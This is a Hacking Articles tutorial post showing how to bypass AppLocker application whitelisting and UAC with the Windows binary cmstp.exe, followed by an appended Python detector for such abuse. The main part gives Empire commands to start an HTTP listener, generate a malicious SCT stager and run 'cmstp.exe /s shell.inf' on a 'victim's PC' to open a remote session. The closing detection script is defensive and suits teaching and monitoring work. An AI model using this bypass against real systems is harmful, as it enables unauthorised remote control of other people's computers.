By default, AppLocker allows binaries located in the Windows folder to execute, which is the main reason it can be bypassed. Such trusted binaries can easily be used to bypass AppLocker along with UAC. One such Microsoft binary is CMSTP. CMSTP accepts INF files, so exploitation through an INF file is possible, and this article shows how that is done.
As we all know, CMSTP accepts SCT files and runs them without suspicion, so we will create a malicious SCT file to reach our goal. We will use Empire PowerShell for this. For a detailed guide on Empire PowerShell, click here.
Launch the Empire framework from the Kali terminal and type the following commands to create your malware:
listeners
uselistener http
set Host 192.168.1.109
execute
The above commands create a listener for you. Then type back to leave the listener interface and, to create the SCT file, type:
usestager windows/launcher_sct
set Listener HTTP
execute
Running the above commands will create your SCT file. We will use the following script to execute our file from PowerShell. In this script, give the path of your SCT file and add the line shown in the image.
Download this script from here:
Now, send the file to the victim's PC and run the following command in the victim's command prompt:
cmstp.exe /s shell.inf
As soon as you run the command, you will have a session. Use the following command to access your session :
interact <session name>
This way, you can use the CMSTP binary to bypass AppLocker restrictions. CMSTP needs an INF file, and by using it to your advantage you can gain access to the victim's PC.
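From the defender's side, the command above leaves a recognisable process-creation trail: cmstp.exe started with the silent switch, an INF outside the usual install directories, and a shell or script host as its parent. The following Python is an added example, not part of the original post, that scans constructed Sysmon-style events for that pattern; the trusted-path allow-list and the parent-process list are assumptions you would tune to your environment.

```python
import re

# Constructed sample process-creation events (Sysmon Event ID 1 style fields), not real telemetry.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\cmstp.exe",
     "CommandLine": r"cmstp.exe /s shell.inf",
     "ParentImage": r"C:\Windows\System32\cmd.exe"},
    {"Image": r"C:\Windows\System32\cmstp.exe",
     "CommandLine": r'cmstp.exe /ni /s "C:\Users\Public\setup.inf"',
     "ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"},
    {"Image": r"C:\Windows\System32\cmstp.exe",
     "CommandLine": r'"C:\Windows\System32\cmstp.exe" /u "C:\Program Files\VPN\corp.inf"',
     "ParentImage": r"C:\Windows\System32\svchost.exe"},
]

# Assumed allow-list: where a legitimately deployed connection-manager profile
# would normally keep its INF. Tune this to your environment.
TRUSTED_INF_PREFIXES = ("c:\\windows\\", "c:\\program files\\", "c:\\program files (x86)\\")
# Assumed parents that indicate an interactive or scripted launch rather than an installer.
SCRIPT_PARENTS = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
TOKEN_RE = re.compile(r'"[^"]*"|\S+')  # keep quoted paths containing spaces as one token

def tokenize(cmdline):
    return [t.strip('"') for t in TOKEN_RE.findall(cmdline)]

def basename(path):
    return path.lower().rsplit("\\", 1)[-1]

def flag_cmstp_event(event):
    """Return the reasons an event looks like CMSTP abuse, or [] if it does not."""
    if basename(event.get("Image", "")) != "cmstp.exe":
        return []
    tokens = tokenize(event.get("CommandLine", ""))
    switches = {t.lower() for t in tokens[1:] if t.startswith("/")}
    inf_files = [t for t in tokens[1:] if t.lower().endswith(".inf")]
    reasons = []
    if "/s" in switches:
        reasons.append("silent install (/s) hides the setup dialog from the user")
    for inf in inf_files:
        if not inf.lower().startswith(TRUSTED_INF_PREFIXES):
            reasons.append(f"INF outside trusted install locations: {inf}")
    parent = basename(event.get("ParentImage", ""))
    if parent in SCRIPT_PARENTS:
        reasons.append(f"launched from shell or script host: {parent}")
    return reasons

def scan_events(events):
    """Return (index, reasons) for every event that produced at least one reason."""
    return [(i, r) for i, e in enumerate(events) if (r := flag_cmstp_event(e))]
```

A single reason on its own is weak evidence; the first two sample events trip all three, which is the combination worth alerting on.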
Author: Yashika Dhir is a passionate researcher and technical writer at Hacking Articles. She is a hacking enthusiast.
The post Bypass Application Whitelisting using cmstp appeared first on Hacking Articles.